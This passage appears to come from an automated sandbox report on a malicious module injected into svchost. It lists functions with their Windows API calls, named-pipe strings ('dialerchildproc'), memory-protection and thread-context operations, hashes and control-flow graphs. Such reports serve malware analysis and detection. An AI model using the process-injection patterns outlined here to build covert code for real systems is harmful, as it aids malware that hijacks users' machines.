                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF76
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: fbbfd203b105abf8085660589179a2c6459f60e277cac02fd6d43f7fad114619
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: F941B13234164882FEF8A735565E37D36965BC67B0F640724A936377E6EE2BC8019E03
                                                        Function 0000026A879C2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: b02012d5428b01c1f3b2143805af3d2ef8a5ba1a4c44cc927d8b5d08adb94f93
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 8C213836618A4082EB50CB25F44836E7BA1F78ABE4F544215EA5913AA8DF7DC189CF02
                                                        Function 0000026A879CA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 584 26a879ca544-26a879ca5ac call 26a879cb414 587 26a879ca5b2-26a879ca5b5 584->587 588 26a879caa13-26a879caa1b call 26a879cc748 584->588 587->588 589 26a879ca5bb-26a879ca5c1 587->589 591 26a879ca5c7-26a879ca5cb 589->591 592 26a879ca690-26a879ca6a2 589->592 591->592 596 26a879ca5d1-26a879ca5dc 591->596 594 26a879ca6a8-26a879ca6ac 592->594 595 26a879ca963-26a879ca967 592->595 594->595 599 26a879ca6b2-26a879ca6bd 594->599 597 26a879ca969-26a879ca970 595->597 598 26a879ca9a0-26a879ca9aa call 26a879c9634 595->598 596->592 600 26a879ca5e2-26a879ca5e7 596->600 597->588 601 26a879ca976-26a879ca99b call 26a879caa1c 597->601 598->588 610 26a879ca9ac-26a879ca9cb call 26a879c7940 598->610 599->595 603 26a879ca6c3-26a879ca6ca 599->603 600->592 604 26a879ca5ed-26a879ca5f7 call 26a879c9634 600->604 601->598 607 26a879ca894-26a879ca8a0 603->607 608 26a879ca6d0-26a879ca707 call 26a879c9a10 603->608 604->610 614 26a879ca5fd-26a879ca628 call 26a879c9634 * 2 call 26a879c9d24 604->614 607->598 611 26a879ca8a6-26a879ca8aa 607->611 608->607 619 26a879ca70d-26a879ca715 608->619 616 26a879ca8ba-26a879ca8c2 611->616 617 26a879ca8ac-26a879ca8b8 call 26a879c9ce4 611->617 652 26a879ca648-26a879ca652 call 26a879c9634 614->652 653 26a879ca62a-26a879ca62e 614->653 616->598 623 26a879ca8c8-26a879ca8d5 call 26a879c98b4 616->623 617->616 632 26a879ca8db-26a879ca8e3 617->632 625 26a879ca719-26a879ca74b 619->625 623->598 623->632 629 26a879ca887-26a879ca88e 625->629 630 26a879ca751-26a879ca75c 625->630 629->607 629->625 630->629 633 26a879ca762-26a879ca77b 630->633 634 26a879ca9f6-26a879caa12 call 26a879c9634 * 2 call 26a879cc6a8 632->634 635 26a879ca8e9-26a879ca8ed 632->635 637 26a879ca874-26a879ca879 633->637 638 26a879ca781-26a879ca7c6 call 26a879c9cf8 * 2 633->638 634->588 639 26a879ca8ef-26a879ca8fe call 26a879c9ce4 635->639 640 26a879ca900 635->640 643 26a879ca884 637->643 665 26a879ca7c8-26a879ca7ee call 26a879c9cf8 call 26a879cac38 638->665 666 26a879ca804-26a879ca80a 638->666 648 26a879ca903-26a879ca90d call 26a879cb4ac 639->648 640->648 643->629 648->598 663 26a879ca913-26a879ca961 call 26a879c9944 call 26a879c9b50 648->663 652->592 669 26a879ca654-26a879ca674 call 26a879c9634 * 2 call 26a879cb4ac 652->669 653->652 657 26a879ca630-26a879ca63b 653->657 657->652 662 26a879ca63d-26a879ca642 657->662 662->588 662->652 663->598 685 26a879ca815-26a879ca872 call 26a879ca470 665->685 686 26a879ca7f0-26a879ca802 665->686 670 26a879ca87b 666->670 671 26a879ca80c-26a879ca810 666->671 690 26a879ca676-26a879ca680 call 26a879cb59c 669->690 691 26a879ca68b 669->691 675 26a879ca880 670->675 671->638 675->643 685->675 686->665 686->666 694 26a879ca686-26a879ca9ef call 26a879c92ac call 26a879caff4 call 26a879c94a0 690->694 695 26a879ca9f0-26a879ca9f5 call 26a879cc6a8 690->695 691->592 694->695 695->634
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 444f81f33de08ab68ee44032b3efa5b7945037919697de8df49d031d9224469b
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: E2E1C172604B80CAEFA0DF65D58939D77A0F799BA8F100116EE8967B99CB35C581CF02
                                                        Function 0000026A87999944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 463 26a87999944-26a879999ac call 26a8799a814 466 26a87999e13-26a87999e1b call 26a8799bb48 463->466 467 26a879999b2-26a879999b5 463->467 467->466 468 26a879999bb-26a879999c1 467->468 470 26a879999c7-26a879999cb 468->470 471 26a87999a90-26a87999aa2 468->471 470->471 475 26a879999d1-26a879999dc 470->475 473 26a87999d63-26a87999d67 471->473 474 26a87999aa8-26a87999aac 471->474 478 26a87999d69-26a87999d70 473->478 479 26a87999da0-26a87999daa call 26a87998a34 473->479 474->473 476 26a87999ab2-26a87999abd 474->476 475->471 477 26a879999e2-26a879999e7 475->477 476->473 481 26a87999ac3-26a87999aca 476->481 477->471 482 26a879999ed-26a879999f7 call 26a87998a34 477->482 478->466 483 26a87999d76-26a87999d9b call 26a87999e1c 478->483 479->466 489 26a87999dac-26a87999dcb call 26a87996d40 479->489 485 26a87999c94-26a87999ca0 481->485 486 26a87999ad0-26a87999b07 call 26a87998e10 481->486 482->489 497 26a879999fd-26a87999a28 call 26a87998a34 * 2 call 26a87999124 482->497 483->479 485->479 490 26a87999ca6-26a87999caa 485->490 486->485 501 26a87999b0d-26a87999b15 486->501 494 26a87999cba-26a87999cc2 490->494 495 26a87999cac-26a87999cb8 call 26a879990e4 490->495 494->479 500 26a87999cc8-26a87999cd5 call 26a87998cb4 494->500 495->494 507 26a87999cdb-26a87999ce3 495->507 530 26a87999a48-26a87999a52 call 26a87998a34 497->530 531 26a87999a2a-26a87999a2e 497->531 500->479 500->507 505 26a87999b19-26a87999b4b 501->505 509 26a87999c87-26a87999c8e 505->509 510 26a87999b51-26a87999b5c 505->510 513 26a87999df6-26a87999e12 call 26a87998a34 * 2 call 26a8799baa8 507->513 514 26a87999ce9-26a87999ced 507->514 509->485 509->505 510->509 515 26a87999b62-26a87999b7b 510->515 513->466 516 26a87999cef-26a87999cfe call 26a879990e4 514->516 517 26a87999d00 514->517 518 26a87999c74-26a87999c79 515->518 519 26a87999b81-26a87999bc6 call 26a879990f8 * 2 515->519 527 26a87999d03-26a87999d0d call 26a8799a8ac 516->527 517->527 523 26a87999c84 518->523 544 26a87999c04-26a87999c0a 519->544 545 26a87999bc8-26a87999bee call 26a879990f8 call 26a8799a038 519->545 523->509 527->479 542 26a87999d13-26a87999d61 call 26a87998d44 call 26a87998f50 527->542 530->471 548 26a87999a54-26a87999a74 call 26a87998a34 * 2 call 26a8799a8ac 530->548 531->530 535 26a87999a30-26a87999a3b 531->535 535->530 540 26a87999a3d-26a87999a42 535->540 540->466 540->530 542->479 552 26a87999c7b 544->552 553 26a87999c0c-26a87999c10 544->553 563 26a87999c15-26a87999c72 call 26a87999870 545->563 564 26a87999bf0-26a87999c02 545->564 568 26a87999a76-26a87999a80 call 26a8799a99c 548->568 569 26a87999a8b 548->569 554 26a87999c80 552->554 553->519 554->523 563->554 564->544 564->545 573 26a87999a86-26a87999def call 26a879986ac call 26a8799a3f4 call 26a879988a0 568->573 574 26a87999df0-26a87999df5 call 26a8799baa8 568->574 569->471 573->574 574->513
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 1f6ce65c737b67c16a74770dcca6a547431568ee9d47403595349a7bcceb887e
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 97E1D572605B408AFBA0DF65D48839D77B4F7A97A8F100116EE8D67B99DB36C091CF02
                                                        Function 0000026A879CF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: e22ce2f0d6908cfb41650f8e3b1f78ec9287b8d585868ecd0f1c06e4ba5b9ad5
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 5D41E633311A0091FE96DB56A80CB5D3BA6F785BE0F5941299D0DAB784EE3AC4458B02
                                                        Function 0000026A879C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 735 26a879c104c-26a879c10b9 RegQueryInfoKeyW 736 26a879c11b5-26a879c11d0 735->736 737 26a879c10bf-26a879c10c9 735->737 737->736 738 26a879c10cf-26a879c111f RegEnumValueW 737->738 739 26a879c11a5-26a879c11af 738->739 740 26a879c1125-26a879c112a 738->740 739->736 739->738 740->739 741 26a879c112c-26a879c1135 740->741 742 26a879c1147-26a879c114c 741->742 743 26a879c1137 741->743 744 26a879c1199-26a879c11a3 742->744 745 26a879c114e-26a879c1193 GetProcessHeap call 26a879d6168 GetProcessHeap HeapFree 742->745 746 26a879c113b-26a879c113f 743->746 744->739 745->744 746->739 747 26a879c1141-26a879c1145 746->747 747->742 747->746
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: f1e6073484f6787d024fb048a9424189236bd7d4ebebf72dc42381622d64dea6
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 76417173214B84C6EBA0CF61E44839E7BA1F389B98F448129EA8917758EF3DC585CB01
                                                        Function 0000026A879CD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD087
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 7de55e3907eeb61d84b2ec02f2a106e95853d66b6f36fb83176ce734d1449b23
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: EC11823170868481FEF8A7395A5E37D715A5BC47F0F644324A839277EAEE6AC5028F02
                                                        Function 0000026A879C7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 4ecf39c6d282c13922bf66bcab5b528d166167323d1dc1c22cdb0ae5698a6f63
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: CA81D43160064186FFD0AB2AA94D3AD7B90ABC97C0F5C4425EA4877796EB7BC9458F03
                                                        Function 0000026A879C9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 95f3983436fef2e635cbbbb6f4cfe75cb904a5ec283e5a170f3328164d622b80
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: FE312731316A00E1EF92DB46A80875C3BA4B7A9BB0F590525DD2E2B390EF3AC145CB02
                                                        Function 0000026A879D3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: b5a7c8e5866d3be681c7c72b6341fd08360724eb52cb5406520433ec029d227b
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: A6116D32310B4086E7E0DB56F84831DBEA0F789FE5F444224EA5E97794DF79C8148B41
                                                        Function 0000026A879C3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: d5baf2fdec3915ccb6d5ba03a26523055d6eaf36c073b9562141c2a23a4540a2
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 91115B36704B4182EF949B62F50826D7AB0FB8ABC5F440029EE8D27794EF3EC505CB06
                                                        Function 0000026A879C5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: d9bcf84c3bd1533dc594d755c904efc893949546bab9f2d4fefad5fd87b2f6ed
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 23D18776208B8882DBB0DB0AE49835E7BA0F3D8B84F540116EA8D57BA9DF7DC541CF41
                                                        Function 0000026A879C2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 8cc78c2e0b9a0818aac4479415df311af9c6568ae4cde8b4077327d37afdd94e
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 2231B032701B5582FA94DF16E54876DBBA4FB85BC0F084020EE4867B55EF36C4A18B42
                                                        Function 0000026A879CCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: a51daef424c37a2d87d3f48ae78d9347c480c631925ac01d6e6589b89c5644b5
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: E611B13130468082FEF4A735965E33D36666BC97F0F500324A83667BDAEE6BC4018E02
                                                        Function 0000026A879C199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 9a315eb257f643b679e19e597653428afdd5a9ed67b0f0b7c202793297a7241d
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: CB016931300A4082EB94DB52A84C35DBBA1F789BC0F884035EE4963755DF3EC989CB01
                                                        Function 0000026A879C36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 0005ef61f3f4758259884e0c528835bf75180136e8c964115b40faba9de71eb2
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: AE012D75211B4482EFA4DB62E80D31D7BB0BB86B86F444428DE4D27754EF7EC1488F02
                                                        Function 0000026A879C9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 92aa7bb9b2b6dfa6ad1a732484a25b6d845d725c4ad4245d6686fe6e64f0842d
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 2D51BD32701640CEEF94DF15E84DB5D3BA6F3A4BA8F518124DA0767788EB76C981CB06
                                                        Function 0000026A879C8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 1ab68a51141d201d9d3457faa14e522c8d132673c329719a63e2eaa97f42be49
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 4331DF32200680CAEB94DF12E84CB1D7BA5F3A4BE8F458014EE4727789DB3AC941CF06
                                                        Function 0000026A879C1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: f116469fb9c2a0e448e9d2de76ad660752bf9178b15ca800e2592a53e1aade34
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 93F03C7230464192EBA0CB21F88875D7F60F789BC8F888021DA4957958DA6EC68DCF05
                                                        Function 0000026A879C3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 8951257b2819e3fd8c3a1e414e7e6c4bb950c718772d34c177490584403dd16d
